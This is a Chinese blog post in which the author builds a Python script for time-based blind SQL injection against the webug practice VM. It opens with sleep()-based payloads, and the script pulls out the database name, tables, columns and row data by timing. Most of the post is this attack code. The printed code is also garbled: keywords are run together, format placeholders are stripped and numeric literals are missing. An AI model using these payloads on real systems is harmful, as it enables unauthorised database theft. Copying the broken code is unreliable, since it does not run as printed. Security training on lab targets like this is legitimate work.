推荐一个自带很多web练习的入门虚拟机--webug,网上有资源,如果嫌大可以找Johnson。
最近johnson在测试webug上的一个时间盲注的时候,就想着自己写一个脚本。
访问页面是这样的:
提示说传一个type参数。
参数变了,页面也会跟着变化,既然是时间注入,就自己手动测试一下。
Payload1:
192.168.1.107/pentest/test/time/?type=1 and if(substr(database(),1,1)='a',sleep(3),1)
页面直接刷新了,最后不断地尝试,发现当payload为:
192.168.1.107/pentest/test/time/?type=1 and if(substr(database(),1,1)='p',sleep(3),1)的时候,页面会暂停3秒,所以数据库的第一个字母是p,为了锻炼自己,手动写了一个简单的,冗余非常大的脚本。
#!/usr/bin/env python
# encoding: utf-8
"""
@version: V1.0
@author: johnson
@file: bool_time.py
@time: 1/2/18 4:24 PM
"""
importrequests
importtime
s =3#设置延时的秒数
#主函数
defmain():
url =raw_input("Please input url:")#输入需要测试的地址
# # url = "http://192.168.1.105/pentest/test/time/?type=1"
payloads ="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789@_.}{,"
print"start get length..."
length = getDatabaseLength(url)#获取数据库的长度
print"start database sql injection..."
database = getDatabaseName(url,length,payloads)#获取数据库的名字
print"the current database is "+ database
print"start get table count..."
table_count = getTableCount(url,database)#获取表的数量
print"the database %s's table count is %d"% (database,table_count)
print"start get table length..."
# table_count = 4
table_length = (getTableLength(url,table_count,database))#获取表的长度
printtable_length
print"start table sql injection..."
tables = getTableName(url,payloads,database,table_length)#获取表名
print"table name is "
printName(tables)
break_while ='Y'
#循环查看表的结构
whilebreak_while =='Y'orbreak_while =='y':
table_name =raw_input("Please input table name:")
columns = getColumnName(url,table_name,database,payloads)#获取指定表的列名
print"column name is "
printName(columns)
break_while =raw_input("Do you want to inject other table name?(Y/n)")
ifbreak_whileisNone:
break_while ='Y'
ifbreak_while =='n'orbreak_while =='N':
get_data =raw_input("Do you want to test other column?(Y/n)")
ifget_data =='Y'orget_data =='y':
column_name =raw_input("Please input column name:")
getDatas(url,payloads,table_name,column_name)#获取指定表指定列的数据
break
else:
break_while ='N'
#获取当前数据库长度
defgetDatabaseLength(url):
foriinrange(1,50):
start_time = time.time()
url1 =" and if(length(database())=, sleep(),1)%23".format(url=url,i=i,s=s)
#print url1
requests.get(url1)
iftime.time() - start_time > s-1:
print"the length is "+str(i)
returni
#获取当前数据库的名字
defgetDatabaseName(url,length,payloads):
database =""
fordinrange(1,length +1):
forpayloadinpayloads:
start_time = time.time()
url2 =" and if(substr(database(), ,1)='', sleep(),1)%23".format(url=url,d=d,payload=payload,s=s)
requests.get(url2)
iftime.time() - start_time > s-1:
database += payload
printdatabase
break
returndatabase
#获取指定数据库的表数量
defgetTableCount(url,database):
table_count =
forcountinrange(1,50):
start_time_of_table_count = time.time()
url_get_count =" and if(substr((select count(*) from information_schema.tables where table_schema=''),1,1) = , sleep(),1)%23".format(url= url,database= database,s= s,count= count)
requests.get(url_get_count)
#print urlGetCount
iftime.time() - start_time_of_table_count > s-1:
table_count = count
break
returntable_count
#获取指定数据库的所有表长度
defgetTableLength(url,table_count,database):
table_length = []
forcountinrange(,table_count):
foriinrange(1,21):
start_time_of_table_length = time.time()
url3 =" and if(substr((select length(table_name) from information_schema.tables where table_schema='' limit ,1),1,1) = , sleep(),1)%23".format(url= url,database= database,count= count,i= i,s= s)
#print url3
requests.get(url3)
iftime.time() - start_time_of_table_length > s-1:
table_length.append(i)
print"the table '%d' length is %s"% (count+1,i)
break
returntable_length
#获取表名字
defgetTableName(url,payloads,database,table_length):
tables = []
foriinrange(,len(table_length)):
table =""
fordinrange(1,table_length[i]+1):
forpayloadinpayloads:
start_time_of_table_name = time.time()
url4 =" and if(substr((select table_name from information_schema.tables where table_schema='' limit ,1),'',1) = '', sleep(),1)".format(url= url,i= i,d= d,payload= payload,database= database,s= s)
requests.get(url4)
iftime.time() - start_time_of_table_name > s-1:
table += payload
printtable
break
tables.append(table)
returntables
#输出名字
defprintName(result):
foriinrange(,len(result)):
printresult[i]
#获取指定表的列的数量
defgetColumnCount(url,table_name,database):
column_count =
forcountinrange(1,50):
start_time_of_column_count = time.time()
url_get_column_count =" and if(substr((select count(*) from information_schema.columns where table_schema='' and table_name=''),1,1) = , sleep(),1)%23".format(url= url,database= database,s= s,table_name=table_name,count= count)
requests.get(url_get_column_count)
# print urlGetColumnCount
iftime.time() - start_time_of_column_count > s-1:
column_count = count
break
returncolumn_count
#获取指定表列的长度
defgetColumnLen(url,column_count,database,table_name):
column_length = []
forcountinrange(,column_count):
foriinrange(1,21):
start_time = time.time()
get_url=" and if(substr((select length(column_name) from information_schema.columns where table_schema='' and table_name='' limit ,1),1,1) = , sleep(),1)%23".format(url= url,database= database,table_name=table_name,count= count,i= i,s= s)
#print getURL
requests.get(get_url)
iftime.time() - start_time > s-1:
column_length.append(i)
print"the column '%d' length is %s"% (count+1,i)
break
returncolumn_length
#获取列名
defgetColumnName(url,table_name,database,payloads):
column_names = []
column_count = getColumnCount(url,table_name,database)
printcolumn_count
column_len = getColumnLen(url,column_count,database,table_name)
forkinrange(,len(column_len)):
column =""
fordinrange(1,column_len[k]+1):
forpayloadinpayloads:
start_time = time.time()
url4 =" and if(substr((select column_name from information_schema.columns where table_schema='' and table_name='' limit ,1),'',1) = '', sleep(),1)%23".format(
url=url,database=database,table_name=table_name,i=k,d=d,payload=payload,s=s)
requests.get(url4)
iftime.time() - start_time > s -1:
column += payload
printcolumn
break
column_names.append(column)
returncolumn_names
#获取指定列的数据数量
defgetDataCount(url,table_name,column_name):
data_count =
forcountinrange(1,50):
start_time = time.time()
url_get_data_count =" and if(substr((select count(*) from ),1,1) = , sleep(),1)%23".format(
url=url,column_name=column_name,s=s,table_name=table_name,count=count)
requests.get(url_get_data_count)
# print urlGetColumnCount
iftime.time() - start_time > s -1:
data_count = count
break
returndata_count
#获取指定列的数据长度
defgetDataLen(url,table_name,column_name,id):
data_len =
forlinrange(,100000):
start_time_of_get_data_len = time.time()
get_data_len_url =" and if(substr((select length() from limit ,1)=,1,1), sleep(),1)%23".format(s= s,l= l,id= id,table_name= table_name,column_name= column_name,url= url)
requests.get(get_data_len_url)
# print get_data_len_url
iftime.time() - start_time_of_get_data_len > s -1:
print"the data '%d' length is %d"% (id,l)
data_len = l
break
returndata_len
#获取数据
defgetDatas(url,payloads,table_name,column_name):
datas = []
data_count = getDataCount(url,table_name,column_name)
print"the data's count is %d"% (data_count)
foriinrange(,data_count):
data =""
data_len = getDataLen(url,table_name,column_name,i)
print"the data's len is %d"% (data_len)
forjinrange(,data_len +1):
forpayloadinpayloads:
start_time = time.time()
url_of_get_datas =" and if(substr((select from limit ,1),,1)='', sleep(),1)%23".format(url=url,column_name=column_name,table_name=table_name,payload=payload,j=j,s=s,i=i)
requests.get(url_of_get_datas)
iftime.time() - start_time > s -1:
data += payload
printdata
break
datas.append(data)
if__name__ =='__main__':
main()
最后的结果就是:
代码写得比较随意,只是希望多交流学习。